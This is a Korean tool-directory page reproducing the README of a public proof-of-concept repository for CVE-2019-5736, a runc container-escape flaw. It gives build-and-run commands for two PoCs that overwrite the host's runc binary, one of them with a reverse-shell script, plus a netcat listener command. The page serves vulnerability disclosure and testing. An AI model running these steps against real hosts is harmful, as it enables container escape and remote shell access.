Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
RunC-CVE-2019-5736 — CVE-2019-5736 POCs | Kitploit
도구/GitHubGitHub/twistlock/runc-cve-2019-5736
Container SecurityVulnerability AnalysisExploitationRed TeamingPayload DevelopmentContainer Escape
GitHubtwistlock/runc-cve-2019-5736

RunC-CVE-2019-5736

CVE-2019-5736 POCs

저장소 보기
863436년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

RunC-CVE-2019-5736

CVE-2019-5736용 PoC 두 개. CVE-2019-5736 및 PoC에 대한 설명은 Twistlock Labs를 참조하세요.

악성 이미지 PoC는 q3k의 PoC를 기반으로 제작되었으므로 모든 공로는 그에게 있습니다.

PoC 실행하기

PoC를 실행하면 호스트의 runc 바이너리가 덮어써집니다. PoC 중 하나를 실행하기 전에 runc 바이너리(일반적으로 /usr/sbin/runc에 위치)의 복사본을 만들어 두는 것이 좋습니다.

저장소를 클론하세요:

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736

Exec PoC

runc를 문자열을 출력하는 간단한 프로그램으로 덮어씁니다.

Exec PoC 실행:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

악성 이미지 PoC

runc를 localhost:2345에 연결되는 간단한 리버스 셸 bash 스크립트로 덮어씁니다.

리버스 셸을 수신 대기:

root@kitploit:~
$ nc -nvlp 2345

다른 셸에서 악성 이미지 PoC를 실행하세요:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC
도구 다운로드